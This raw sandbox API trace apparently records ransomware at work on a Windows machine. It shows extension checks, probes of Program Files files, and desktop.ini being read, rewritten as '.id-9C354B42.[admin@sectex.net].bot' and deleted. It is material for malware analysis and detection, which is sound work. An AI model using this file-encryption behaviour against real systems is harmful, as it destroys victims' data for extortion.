	[0049.138] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString=".dbf") returned 4
	[0049.138] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString=".1cd") returned 4
	[0049.139] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.139] lstrlenW (lpString=".jpg") returned 4
	[0049.139] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.139] lstrcmpiW (lpString1=".inc", lpString2=".bot") returned 1
	[0049.139] lstrlenW (lpString="oledbjvs.inc") returned 12
	[0049.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0049.140] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=9804) returned 1
	[0049.140] CloseHandle (hObject=0x1f0) returned 1
	[0049.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc")) returned 0x20
	[0049.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.141] lstrlenW (lpString=".doc") returned 4
	[0049.141] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.141] lstrlenW (lpString=".docx") returned 5
	[0049.141] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.141] lstrlenW (lpString=".pdf") returned 4
	[0049.141] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.141] lstrlenW (lpString=".xls") returned 4
	[0049.141] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.141] lstrlenW (lpString=".xlsx") returned 5
	[0049.141] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.141] lstrlenW (lpString=".ppt") returned 4
	[0049.141] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.141] lstrlenW (lpString=".zip") returned 4
	[0049.141] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.141] lstrlenW (lpString=".rar") returned 4
	[0049.141] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.141] lstrlenW (lpString=".bz2") returned 4
	[0049.141] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.141] lstrlenW (lpString=".7z") returned 3
	[0049.141] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.141] lstrlenW (lpString=".dbf") returned 4
	[0049.141] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.141] lstrlenW (lpString=".1cd") returned 4
	[0049.141] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.141] lstrlenW (lpString=".jpg") returned 4
	[0049.142] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.142] lstrlenW (lpString=".doc") returned 4
	[0049.142] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.142] lstrlenW (lpString=".docx") returned 5
	[0049.142] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.142] lstrlenW (lpString=".pdf") returned 4
	[0049.142] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.142] lstrlenW (lpString=".xls") returned 4
	[0049.142] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.142] lstrlenW (lpString=".xlsx") returned 5
	[0049.142] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.142] lstrlenW (lpString=".ppt") returned 4
	[0049.142] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.142] lstrlenW (lpString=".zip") returned 4
	[0049.142] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.142] lstrlenW (lpString=".rar") returned 4
	[0049.142] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.142] lstrlenW (lpString=".bz2") returned 4
	[0049.142] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.142] lstrlenW (lpString=".7z") returned 3
	[0049.142] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.142] lstrlenW (lpString=".dbf") returned 4
	[0049.142] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.142] lstrlenW (lpString=".1cd") returned 4
	[0049.142] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56
	[0049.142] lstrlenW (lpString=".jpg") returned 4
	[0049.142] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.143] lstrcmpiW (lpString1=".inc", lpString2=".bot") returned 1
	[0049.143] lstrlenW (lpString="oledbvbs.inc") returned 12
	[0049.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0049.143] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=9975) returned 1
	[0049.143] CloseHandle (hObject=0x1f0) returned 1
	[0049.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20
	[0049.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.143] lstrlenW (lpString=".doc") returned 4
	[0049.143] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.143] lstrlenW (lpString=".docx") returned 5
	[0049.143] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.143] lstrlenW (lpString=".pdf") returned 4
	[0049.143] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.143] lstrlenW (lpString=".xls") returned 4
	[0049.143] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString=".xlsx") returned 5
	[0049.144] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.144] lstrlenW (lpString=".ppt") returned 4
	[0049.144] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.144] lstrlenW (lpString=".zip") returned 4
	[0049.144] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString=".rar") returned 4
	[0049.144] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString=".bz2") returned 4
	[0049.144] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.144] lstrlenW (lpString=".7z") returned 3
	[0049.144] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.144] lstrlenW (lpString=".dbf") returned 4
	[0049.144] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.144] lstrlenW (lpString=".1cd") returned 4
	[0049.144] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.144] lstrlenW (lpString=".jpg") returned 4
	[0049.144] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.144] lstrlenW (lpString=".doc") returned 4
	[0049.144] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.144] lstrlenW (lpString=".docx") returned 5
	[0049.144] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.144] lstrlenW (lpString=".pdf") returned 4
	[0049.144] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString=".xls") returned 4
	[0049.144] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.144] lstrlenW (lpString=".xlsx") returned 5
	[0049.144] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.144] lstrlenW (lpString=".ppt") returned 4
	[0049.145] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.145] lstrlenW (lpString=".zip") returned 4
	[0049.145] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.145] lstrlenW (lpString=".rar") returned 4
	[0049.145] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.145] lstrlenW (lpString=".bz2") returned 4
	[0049.145] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.145] lstrlenW (lpString=".7z") returned 3
	[0049.145] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.145] lstrlenW (lpString=".dbf") returned 4
	[0049.145] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.145] lstrlenW (lpString=".1cd") returned 4
	[0049.145] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56
	[0049.145] lstrlenW (lpString=".jpg") returned 4
	[0049.145] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.145] lstrcmpiW (lpString1=".ini", lpString2=".bot") returned 1
	[0049.145] lstrlenW (lpString="desktop.ini") returned 11
	[0049.145] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0049.145] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=174) returned 1
	[0049.145] CloseHandle (hObject=0x1f0) returned 1
	[0049.146] GetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 0x26
	[0049.146] GetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.146] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0049.146] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.146] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.146] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.146] GetLastError () returned 0x0
	[0049.146] ReadFile (in: hFile=0x1f0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xae, lpOverlapped=0x0) returned 1
	[0049.147] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xb0, lpOverlapped=0x0) returned 1
	[0049.148] ReadFile (in: hFile=0x1f0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0049.148] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0049.148] SetEndOfFile (hFile=0x228) returned 1
	[0049.148] CloseHandle (hObject=0x228) returned 1
	[0049.148] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.148] SetEndOfFile (hFile=0x1f0) returned 1
	[0049.149] CloseHandle (hObject=0x1f0) returned 1
	[0049.149] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x26) returned 1
	[0049.150] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1
	[0049.150] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.150] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.150] lstrlenW (lpString=".doc") returned 4
	[0049.150] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0049.150] lstrlenW (lpString=".docx") returned 5
	[0049.150] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0049.150] lstrlenW (lpString=".pdf") returned 4
	[0049.150] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0049.150] lstrlenW (lpString=".xls") returned 4
	[0049.150] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0049.150] lstrlenW (lpString=".xlsx") returned 5
	[0049.150] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0049.150] lstrlenW (lpString=".ppt") returned 4
	[0049.150] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0049.150] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.150] lstrlenW (lpString=".zip") returned 4
	[0049.150] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0049.150] lstrlenW (lpString=".rar") returned 4
	[0049.150] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0049.150] lstrlenW (lpString=".bz2") returned 4
	[0049.150] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0049.150] lstrlenW (lpString=".7z") returned 3
	[0049.150] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0049.150] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.150] lstrlenW (lpString=".dbf") returned 4
	[0049.150] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString=".1cd") returned 4
	[0049.151] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString=".jpg") returned 4
	[0049.151] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString=".doc") returned 4
	[0049.151] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0049.151] lstrlenW (lpString=".docx") returned 5
	[0049.151] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0049.151] lstrlenW (lpString=".pdf") returned 4
	[0049.151] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0049.151] lstrlenW (lpString=".xls") returned 4
	[0049.151] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0049.151] lstrlenW (lpString=".xlsx") returned 5
	[0049.151] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0049.151] lstrlenW (lpString=".ppt") returned 4
	[0049.151] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString=".zip") returned 4
	[0049.151] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0049.151] lstrlenW (lpString=".rar") returned 4
	[0049.151] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0049.151] lstrlenW (lpString=".bz2") returned 4
	[0049.151] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0049.151] lstrlenW (lpString=".7z") returned 3
	[0049.151] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString=".dbf") returned 4
	[0049.151] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.151] lstrlenW (lpString=".1cd") returned 4
	[0049.151] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0049.151] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28
	[0049.152] lstrlenW (lpString=".jpg") returned 4
	[0049.152] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0049.152] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0049.152] lstrlenW (lpString="DissolveAnother.png") returned 19
	[0049.152] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.153] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=27935) returned 1
	[0049.153] CloseHandle (hObject=0x228) returned 1
	[0049.153] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png")) returned 0x20
	[0049.153] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.153] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.153] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.153] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.153] lstrlenW (lpString=".doc") returned 4
	[0049.153] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.153] lstrlenW (lpString=".docx") returned 5
	[0049.153] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1
	[0049.153] lstrlenW (lpString=".pdf") returned 4
	[0049.153] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.153] lstrlenW (lpString=".xls") returned 4
	[0049.153] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.154] lstrlenW (lpString=".xlsx") returned 5
	[0049.154] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1
	[0049.154] lstrlenW (lpString=".ppt") returned 4
	[0049.154] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.154] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.154] lstrlenW (lpString=".zip") returned 4
	[0049.154] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.154] lstrlenW (lpString=".rar") returned 4
	[0049.154] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.154] lstrlenW (lpString=".bz2") returned 4
	[0049.154] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.154] lstrlenW (lpString=".7z") returned 3
	[0049.154] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.154] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.154] lstrlenW (lpString=".dbf") returned 4
	[0049.154] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.154] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.154] lstrlenW (lpString=".1cd") returned 4
	[0049.154] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.154] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.154] lstrlenW (lpString=".jpg") returned 4
	[0049.154] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.154] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.154] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.154] lstrlenW (lpString=".doc") returned 4
	[0049.154] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.154] lstrlenW (lpString=".docx") returned 5
	[0049.154] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1
	[0049.154] lstrlenW (lpString=".pdf") returned 4
	[0049.154] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.154] lstrlenW (lpString=".xls") returned 4
	[0049.154] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.154] lstrlenW (lpString=".xlsx") returned 5
	[0049.154] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1
	[0049.155] lstrlenW (lpString=".ppt") returned 4
	[0049.155] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.155] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.155] lstrlenW (lpString=".zip") returned 4
	[0049.155] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.155] lstrlenW (lpString=".rar") returned 4
	[0049.155] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.155] lstrlenW (lpString=".bz2") returned 4
	[0049.155] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.155] lstrlenW (lpString=".7z") returned 3
	[0049.155] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.155] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.155] lstrlenW (lpString=".dbf") returned 4
	[0049.155] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.155] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.155] lstrlenW (lpString=".1cd") returned 4
	[0049.155] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.155] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53
	[0049.155] lstrlenW (lpString=".jpg") returned 4
	[0049.155] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.155] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0049.155] lstrlenW (lpString="DissolveNoise.png") returned 17
	[0049.155] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.155] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=751669) returned 1
	[0049.156] CloseHandle (hObject=0x228) returned 1
	[0049.156] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png")) returned 0x20
	[0049.156] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
